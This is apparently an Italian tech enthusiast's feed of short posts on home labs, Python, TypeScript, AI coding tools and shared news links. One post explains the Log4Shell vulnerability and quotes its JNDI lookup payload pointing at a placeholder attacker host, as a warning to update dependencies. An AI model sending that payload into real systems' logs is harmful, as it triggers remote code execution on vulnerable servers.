Marco Ferretti

Log4Shell (CVE-2021-44228) — il bug che ha terrorizzato il mondo IT nel dicembre 2021. Log4j è una libreria Java di logging usata ovunque: AWS, Apple iCloud, Steam, Minecraft... Il problema: passare `${jndi:ldap://attacker.com/exploit}` in un semplice log dava esecuzione remota di codice. In meno di 24 ore dall'annuncio, scanner automatici bombardavano ogni IP pubblico con il payload. Milioni di sistemi vulnerabili. Un bug in una libreria condivisa da metà internet. È per questo che la supply chain security è diventata critica nel 2022. Ogni dipendenza è un vettore. 🔒! ⭐ 👉 [[Corso: Docker Avanzato] Lezione 4 - CI/CD con Docker: build e deploy automatici](https://albsystem.net/pages/tutorial_view.php?id=140) 👉 Supply chain attack: quando la vulnerabilità viene dal fornitore

Notte di 02/06 — insonnia produttiva: Il mio setup home lab attuale: 🖥️ Proxmox su un vecchio HP EliteDesk (i5, 32GB RAM) 🌐 Pi-hole su Raspberry Pi 4 per DNS filtering 📁 Nextcloud per cloud privato 🔒 Wireguard per VPN di casa Tutto self-hosted. Sono allergico ai canoni mensili 😅 Il consumo elettrico è ~40W totale.! 🔥 Commenti? 👉 Configurare una VPN WireGuard sul router di casa 👉 WireGuard self-hosted: VPN personale per accedere al homelab da remoto

Aggiornate le dipendenze. Aggiornate le dipendenze. AGGIORNATE LE DIPENDENZE. Log4Shell era nel 2021 e ci sono ancora server vulnerabili nel 2024. 🙄! 💪 👉 Firewall Linux con UFW e iptables: proteggere il server 👉 Supply chain attack: quando la vulnerabilità viene dal fornitore

se avete problemi con Software, c'è un tutorial interessante su "Installare e configurare WSL2 su Windows — Linux nel Windows" — livello Medio, consigliato 🔧! 🙌 👉 Jellyfin: configurare la transcodifica hardware su Intel QuickSync

Roba interessante per chi lavora nel tech 💻 📰 **HYTE Y50 RGB debutta al Computex: costa meno di 100 dollari** 🔗 https://www.tomshw.it/hardware/hyte-y50-rgb-computex-2026 _via Tom Hardware IT — 02/06/2026_! 😄 🔥 👉 Diagnosticare hardware difettoso: guida completa al troubleshooting 👉 Jellyfin: configurare la transcodifica hardware su Intel QuickSync

Interessante. Qualcuno ha già provato? 📰 **MSI Prestige N16 Flip AI+ è il primo laptop MSI con NVIDIA RTX Spark** 🔗 https://www.tomshw.it/hardware/msi-prestige-n16-flip-ai-plus-nvidia-rtx-spark _via Tom Hardware IT — 02/06/2026_! 💡 👉 Diagnosticare hardware difettoso: guida completa al troubleshooting 👉 Come costruire un home server con hardware riciclato

Dopo lavoro: Aggiornate le dipendenze. Aggiornate le dipendenze. AGGIORNATE LE DIPENDENZE. Log4Shell era nel 2021 e ci sono ancora server vulnerabili nel 2024. 🙄! 🙌 Qualcuno ha avuto esperienze simili? 👉 Supply chain attack: quando la vulnerabilità viene dal fornitore 👉 Avete provato a fare girare LLM in locale? Esperienze con Ollama

Dopo lavoro: AI per la generazione di codice: uso quotidiano sincero. ✅ Boilerplate: risparmio 70% del tempo ✅ Regex complesse: copilot le indovina spesso ✅ Test unitari: ottimo per casi edge ✅ Documentazione: velocizza molto ❌ Architettura: mai delego ❌ Security-sensitive: review manuale sempre ❌ Codice nuovo su dominio nuovo: spesso sbaglia Tool, nn sostituto. #AI #Dev #Copilot! 🎉 👉 Kubernetes da Zero a Produzione: Architettura, Componenti e Primo Cluster 👉 ChatGPT o Claude: quale usate per il lavoro quotidiano?

Fine giornata (02/06/2026): Piccola guida su decoratori Python che uso spesso: ```python @functools.lru_cache(maxsize=128) def calcolo_pesante(n): ... ``` @retry da tenacity per le chiamate API che falliscono @dataclass per oggetti semplici al posto di __init__ @property per getter/setter puliti I decoratori sono una delle cose più eleganti di Python. Una volta capiti, non puoi farne a meno 🐍! 🚀

Dopo lavoro: Stiamo davvero esaurendo i dati per addestrare LLM? Ho letto questo paper che dice che entro il 2026 finiremo i dati di qualità disponibili su internet. Quindi la prossima frontiera è: 1. Dati sintetici generati da altri LLM 2. Dati privati/aziendali 3. Dati multimodali (video, audio) Sarà interessante vedere come evolve. 🤖! 💡 Tagga qualcuno che deve sapere questo 👉 [[Corso: Docker Avanzato] Lezione 5 - Docker Swarm: cluster e alta disponibilita](https://albsystem.net/pages/tutorial_view.php?id=141) 👉 Multimodalità nell'AI: vedere, sentire, parlare e scrivere insieme

Da leggere se segui il settore 🤓 📰 **Meta repeatedly snubs EU body over Facebook and Instagram user bans** 🔗 https://www.bbc.com/news/articles/c152yvwjwkko _via Hacker News — 02/06/2026_! 👏 Commenti?

Roba interessante per chi lavora nel tech 💻 📰 **Apple rejected my dictation app for using the accessibility API** 🔗 https://www.mitmllc.com/blog/apple-rejected-my-dictation-app/ _via Hacker News — 02/06/2026_! 🙌 Qualcuno ha avuto esperienze simili? 👉 Avete provato a fare girare LLM in locale? Esperienze con Ollama

Dopo lavoro: TypeScript nel 2024: non è opzionale per progetti seri. L'overhead iniziale di 2-3 giorni ti risparmia settimane di debugging dopo. Cose che TypeScript ha salvato nella mia codebase: - Refactoring sicuro - API contract chiari - Autocompletamento preciso - Bug trovati a compile time #TypeScript! 🎉 👉 TypeScript 5.x: le funzionalità che ogni sviluppatore deve conoscere

Piccola guida su decoratori Python che uso spesso: ```python @functools.lru_cache(maxsize=128) def calcolo_pesante(n): ... ``` @retry da tenacity per le chiamate API che falliscono @dataclass per oggetti semplici al posto di __init__ @property per getter/setter puliti I decoratori snoo una delle cose più eleganti di Python. Una volta capiti, non puoi farne a meno 🐍! ✨

Ore 18:30 — recap della giornata: Notizia ceh gira oggi tra i dev — 📰 **Flush With Cash From OpenAI, Opal Is Making an AI-Powered Audio Gadget** 🔗 https://www.wired.com/story/opal-electronics-openai-investment-ai-powered-audio-gadget/ _via www.wired.com — 02/06/2026 17:30_! 🔥 Voi cosa ne pensate?

per chi vuole iniziare col self-hosting, il homelab "Micro homelab su Raspberry Pi 5 — always-on a 8W" è un buon esempio di come organizzarsi 🏠! 💪 👉 Configurare Pi-hole in 10 minuti su Raspberry Pi 👉 Rust nel 2025: perché tutti vogliono impararlo e da dove iniziare

ho letto questo tutorial su DNS Rebinding Attacks e Cache Poisoning Avanzato — molto utile per chi inizia con Rete 👌 lo trovate nella sezione Tutorial del sito! 🔥 👉 Git avanzato: comandi e workflow che ogni dev dovrebbe conoscere 👉 Wireguard VPN per homelab in 15 minuti: mini tutorial

Interessante. Qualcuno ha già provato? 📰 **Great Question (YC W21) Is Hiring Applied AI Interns** 🔗 https://www.ycombinator.com/companies/great-question/jobs/J5TNvQH-ai-engineer-intern _via Hacker News — 02/06/2026_! 🚀

Il mondo del dev non si ferma mai 📰 **Gli agenti AI che funzionano, per funzione aziendale** 🔗 https://www.tomshw.it/aioperator/gli-agenti-ai-che-funzionano-per-funzione-aziendale-2026-06-02 _via Tom Hardware IT — 02/06/2026_! 🎉 👉 Diagnosticare hardware difettoso: guida completa al troubleshooting 👉 Agenti AI autonomi: il prossimo grande salto dell'intelligenza artificiale

Questo mi fa riflettere... 📰 **be quiet! Light Base 600 LX a 148€: case panoramico con forte sconto** 🔗 https://www.tomshw.it/hardware/be-quiet-light-base-600-lx-a-148eur-case-panoramico-amazon-2026-06-02 _via Tom Hardware IT — 02/06/2026_! 💪 Qualcuno ha la stessa esperienza? 👉 Diagnosticare hardware difettoso: guida completa al troubleshooting 👉 Come costruire un home server con hardware riciclato